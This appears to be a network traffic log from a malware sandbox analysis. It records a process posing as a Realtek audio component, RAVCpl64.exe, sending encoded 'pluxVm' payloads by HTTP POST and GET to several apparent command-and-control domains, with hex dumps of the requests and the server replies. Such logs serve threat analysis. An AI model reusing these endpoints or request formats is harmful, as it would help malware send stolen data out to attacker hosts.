                                                                                                                                                                                                                                Dec 3, 2024 14:52:48.926189899 CET418OUTGET /og0p/?pluxVm=aYNz5vX3IaeBLII2gGf9eURLdfN+pzrBFxzqHFB0Zc0E767K5MaAH/EqLovM7A815HxojS38W68HbT3JNl21N4jIU1lh5jKS99Zmbqcxop+R6eeWU//8U3E=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.eichner.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.118822098 CET159INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:49 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: UD Webspace 3.2
                                                                                                                                                                                                                                Data Raw: 31 39 65 30 0d 0a
                                                                                                                                                                                                                                Data Ascii: 19e0
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119079113 CET1289INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 73
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,htm
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119296074 CET1289INData Raw: 41 50 59 61 64 38 47 41 36 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b 70 4a 43
                                                                                                                                                                                                                                Data Ascii: APYad8GA6AAAAAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oCPB/
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119348049 CET1289INData Raw: 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 64 78 41 51 51 43 38 66 67 72 50 5a 6c 78 51 33 73 61 52 41 4d 2b 66 77 75 64 72 56 73 71 52 76 42 5a 34 7a 74 64 65 45 44
                                                                                                                                                                                                                                Data Ascii: 4z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZA++RBg
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119390965 CET1289INData Raw: 48 4d 42 77 36 55 5a 69 45 47 77 30 35 65 47 33 72 56 47 61 33 51 42 57 48 42 50 6e 61 78 69 49 52 32 37 4c 2f 68 42 45 69 42 33 66 59 50 6c 71 4c 67 42 4e 6c 39 79 4f 33 77 6c 6b 70 44 55 68 6b 70 63 31 61 6c 4a 2f 6f 7a 46 57 72 50 55 54 74 6a
                                                                                                                                                                                                                                Data Ascii: HMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC');overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#logo img{b
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119434118 CET1289INData Raw: 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72 72 65 69 63 68 62 61 72 20 69 73 74 2e
                                                                                                                                                                                                                                Data Ascii: bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem <a href="ht
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119467974 CET186INData Raw: 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 77 72 61 70 70 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72
                                                                                                                                                                                                                                Data Ascii: enschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                21192.168.11.20497808.136.96.106807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.832865953 CET689OUTPOST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6f 4c 43 51 74 45 69 6e 75 48 72 5a 55 4f 54 2b 6c 2b 41 77 49 37 47 75 46 37 37 6e 4b 6d 79 69 62 76 34 55 76 39 2b 48 51 5a 39 6f 55 6a 2f 30 2b 46 2b 38 6f 34 71 7a 64 49 45 74 33 36 72 68 34 32 70 59 65 33 2b 72 72 79 70 79 38 38 63 35 49 32 78 4e 34 72 2b 64 78 39 45 49 63 55 72 57 78 33 68 61 56 2b 62 46 4f 6a 75 65 59 56 54 53 73 46 30 53 36 4d 62 63 59 4e 76 6b 38 47 67 49 2f 4d 37 70 55 47 64 63 79 62 62 56 57 37 4d 33 69 5a 31 59 58 50 72 6a 32 50 77 57 58 5a 69 6b 77 51 67 51 77 68 38 32 38 58 61 38 42 4f 2b 69 49 6f 35 34 63 52 58 2b 41 5a 37 30 2f 71 6b 44 59 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZUOT+l+AwI7GuF77nKmyibv4Uv9+HQZ9oUj/0+F+8o4qzdIEt36rh42pYe3+rrypy88c5I2xN4r+dx9EIcUrWx3haV+bFOjueYVTSsF0S6MbcYNvk8GgI/M7pUGdcybbVW7M3iZ1YXPrj2PwWXZikwQgQwh828Xa8BO+iIo54cRX+AZ70/qkDYg==
                                                                                                                                                                                                                                Dec 3, 2024 14:52:56.160330057 CET403INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:55 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                22192.168.11.20497818.136.96.106807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:58.682605028 CET709OUTPOST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6f 4c 43 51 74 45 69 6e 75 48 72 5a 57 75 44 2b 69 64 59 77 4f 62 47 74 41 37 37 6e 66 57 79 6d 62 76 30 55 76 38 4c 63 51 71 5a 6f 58 44 50 30 2f 42 71 38 6c 59 71 7a 57 6f 45 6b 7a 36 72 71 34 32 6c 36 65 79 47 72 72 79 39 79 38 2b 30 35 49 47 4e 4b 69 62 2b 66 35 64 45 4b 52 30 72 57 78 33 68 61 56 2b 6d 75 4f 6a 32 65 59 6b 6a 53 74 6b 30 64 33 73 62 66 62 4e 76 6b 74 57 67 4d 2f 4d 36 2b 55 44 68 32 79 64 48 56 57 37 38 33 69 49 31 58 43 66 71 71 70 66 78 64 51 5a 58 54 35 41 59 73 38 68 64 71 31 6b 69 4a 4e 34 7a 34 56 61 4e 63 66 43 4c 4d 45 70 43 63 39 6f 6c 59 46 6c 7a 78 6b 79 49 4c 36 6c 41 76 69 43 6b 79 43 70 51 35 31 30 6b 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZWuD+idYwObGtA77nfWymbv0Uv8LcQqZoXDP0/Bq8lYqzWoEkz6rq42l6eyGrry9y8+05IGNKib+f5dEKR0rWx3haV+muOj2eYkjStk0d3sbfbNvktWgM/M6+UDh2ydHVW783iI1XCfqqpfxdQZXT5AYs8hdq1kiJN4z4VaNcfCLMEpCc9olYFlzxkyIL6lAviCkyCpQ510k=
                                                                                                                                                                                                                                Dec 3, 2024 14:52:59.006656885 CET403INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:58 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                23192.168.11.20497828.136.96.106807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557466030 CET6445OUTPOST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6f 4c 43 51 74 45 69 6e 75 48 72 5a 57 75 44 2b 69 64 59 77 4f 62 47 74 41 37 37 6e 66 57 79 6d 62 76 30 55 76 38 4c 63 51 71 52 6f 58 79 76 30 2b 6d 47 38 71 34 71 7a 4b 34 45 68 7a 36 72 7a 34 32 74 2b 65 7a 36 52 72 77 46 79 39 66 55 35 42 55 70 4b 33 4c 2b 66 31 39 45 4c 63 55 72 35 78 33 78 57 56 34 47 75 4f 6a 32 65 59 6d 37 53 6b 56 30 64 78 73 62 63 59 4e 75 77 38 47 68 70 2f 4d 6a 4c 55 43 56 4d 79 75 66 56 57 62 73 33 67 2b 70 58 44 2f 71 6f 71 66 77 64 51 5a 4c 4d 35 42 30 61 38 68 6f 39 31 6e 79 4a 63 76 53 33 47 35 39 66 64 7a 36 46 4a 49 4b 6d 38 34 78 55 48 6b 6a 4d 73 30 70 71 30 77 38 76 69 55 30 71 48 73 4d 6f 71 44 75 70 38 71 66 2b 54 76 6d 45 69 46 4b 74 43 6c 31 4b 4a 35 30 2f 41 32 4a 5a 79 5a 6a 6f 4c 77 67 73 46 50 56 49 35 41 6a 35 6f 4c 2b 67 70 47 6a 4a 32 72 6c 35 78 4d 7a 50 51 61 31 6a 33 4e 73 2f 4a 66 32 4c 47 69 45 30 62 2f 6a 32 4f 75 4f 67 57 49 62 64 7a 39 61 63 67 6f 54 44 41 6e 63 61 71 69 59 73 50 6b 6b 54 56 79 55 38 6c 67 4a 71 47 35 2f [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZWuD+idYwObGtA77nfWymbv0Uv8LcQqRoXyv0+mG8q4qzK4Ehz6rz42t+ez6RrwFy9fU5BUpK3L+f19ELcUr5x3xWV4GuOj2eYm7SkV0dxsbcYNuw8Ghp/MjLUCVMyufVWbs3g+pXD/qoqfwdQZLM5B0a8ho91nyJcvS3G59fdz6FJIKm84xUHkjMs0pq0w8viU0qHsMoqDup8qf+TvmEiFKtCl1KJ50/A2JZyZjoLwgsFPVI5Aj5oL+gpGjJ2rl5xMzPQa1j3Ns/Jf2LGiE0b/j2OuOgWIbdz9acgoTDAncaqiYsPkkTVyU8lgJqG5/kukw1bQyUc84UeJo0W8doNYPtKhNfQE7Ma4OuSR4qHHsW+FI6hlKpF++5wGQUgniIKNRWcWJp2J+1S/PG/xxr1WnlVq+xIKqmQH4rEqaXiO6aCsKIn3xEyXOZWqQvAiP+vM5jF9e+n9v2keY4n5q9fMPxoLVaBulqCjC0ZHODvyvzIKUFTXs98QYml1VHfcOlk/pbdPZS0E5EEZvT2C6t85ta2NN6oGYwe2jEOahUWeoapObHbtKBECrNPEpiQKC1bBTBUDiTSgZ7mNHGpbp+EhSrprDqktP3O4Kg1UuAmS+7tihCGvGMZNbI02CCXkCs8RV8R900X85ATZSFQJVbnM1Y2RvfX9TWNjEYzWEmeYb3ujX9BgCUoBpS1UJ3H+veiuWQx8vpYVTxDN7vuGtmjQuIMaJxeYvdTt2Mdj9+ogMqEK427aSfCJM0NcMcENmoFOY9zRciC13lIhcGVdk8vVNEOufLMQjaPq1Fthf27r4fduLH2o2cjBx2kWqYgUJEFcOBhLFIg8wL2pJ9g9RCm7I939SFL86Edh61mwfOP9LBieI1tSfYfn5VGqYuVYEApuhmgvVULEaJx2AurBiGjJL/KKD4PhwZaPuY1CoiPGvCahjQw4qX6OyEchtRUMKdEhgTQIlsMQ/5lWHJd9U37jK8TK2kzs35G [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557502031 CET1289OUTData Raw: 47 34 31 76 6e 6c 43 42 6d 55 43 6c 37 49 62 4c 4b 59 70 75 70 33 5a 49 6e 66 53 6a 34 68 67 76 31 35 47 77 57 58 62 59 6e 46 57 73 79 4c 50 62 4c 63 58 61 31 54 54 6b 6e 72 71 78 4d 6f 75 79 30 34 70 4b 4f 43 41 78 47 4d 58 6e 37 2f 57 4a 2b 77
                                                                                                                                                                                                                                Data Ascii: G41vnlCBmUCl7IbLKYpup3ZInfSj4hgv15GwWXbYnFWsyLPbLcXa1TTknrqxMouy04pKOCAxGMXn7/WJ+wNhQ22NsmXnE3tzkWeUtifEmRPxrmPoiMNQAlt8z9InCQ9+qc5PfUeIaAEChBaxpeEVi9woXP3YA2E5t9YM/C3jAyNVMV358HZSutldCCZ4hGrEYMjloHXm0QZbCMJL1lSfZbMB2NjRwSwnUm2VuVNbkY+kDGXc9JW
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557573080 CET124OUTData Raw: 48 47 33 63 5a 57 63 41 43 37 71 37 59 54 7a 62 68 73 6b 76 30 68 38 53 6e 2b 33 50 52 4f 6f 63 62 55 39 66 4d 68 4b 58 43 42 35 72 54 46 68 77 30 77 33 64 77 6f 53 6e 49 7a 2b 7a 51 4f 5a 48 35 52 2b 65 4d 74 42 5a 6b 63 2f 54 59 33 4d 30 47 34
                                                                                                                                                                                                                                Data Ascii: HG3cZWcAC7q7YTzbhskv0h8Sn+3PROocbU9fMhKXCB5rTFhw0w3dwoSnIz+zQOZH5R+eMtBZkc/TY3M0G41K3UNyjZxgWqyPc0vge+BNNke72ZXQy0KjW2x21g==
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898566008 CET403INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:01 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                24192.168.11.20497838.136.96.106807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.467344999 CET422OUTGET /mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.844867945 CET546INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:04 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                25192.168.11.204978438.47.233.4807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.293055058 CET671OUTPOST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 6d 68 70 72 69 4e 54 68 50 59 39 6b 5a 57 47 6f 4b 78 32 7a 41 67 42 6d 6e 50 43 69 62 49 74 68 6d 55 6e 66 74 56 4e 70 4d 56 39 56 31 59 35 53 34 50 70 41 33 69 32 35 45 74 73 4a 31 4f 72 4f 45 44 38 36 4f 69 69 47 55 56 43 42 39 33 6c 63 48 5a 36 67 52 56 73 7a 45 50 48 75 57 6a 61 6a 67 53 52 6f 4d 45 4d 38 70 6a 58 4f 34 46 65 39 6b 47 54 4d 52 43 4a 6b 4f 6f 57 75 38 59 6b 79 64 50 6a 62 59 36 70 4c 47 70 31 69 66 4f 42 63 4b 72 42 57 52 4a 4b 33 49 67 33 52 58 48 67 57 7a 50 6e 35 49 67 73 46 4c 43 59 4e 4e 73 6e 36 4e 6b 6d 58 6d 2b 6a 70 39 78 77 30 55 6c 73 78 37 51 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZWGoKx2zAgBmnPCibIthmUnftVNpMV9V1Y5S4PpA3i25EtsJ1OrOED86OiiGUVCB93lcHZ6gRVszEPHuWjajgSRoMEM8pjXO4Fe9kGTMRCJkOoWu8YkydPjbY6pLGp1ifOBcKrBWRJK3Ig3RXHgWzPn5IgsFLCYNNsn6NkmXm+jp9xw0Ulsx7Q==
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612310886 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:10 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                26192.168.11.204978538.47.233.4807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.142272949 CET691OUTPOST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
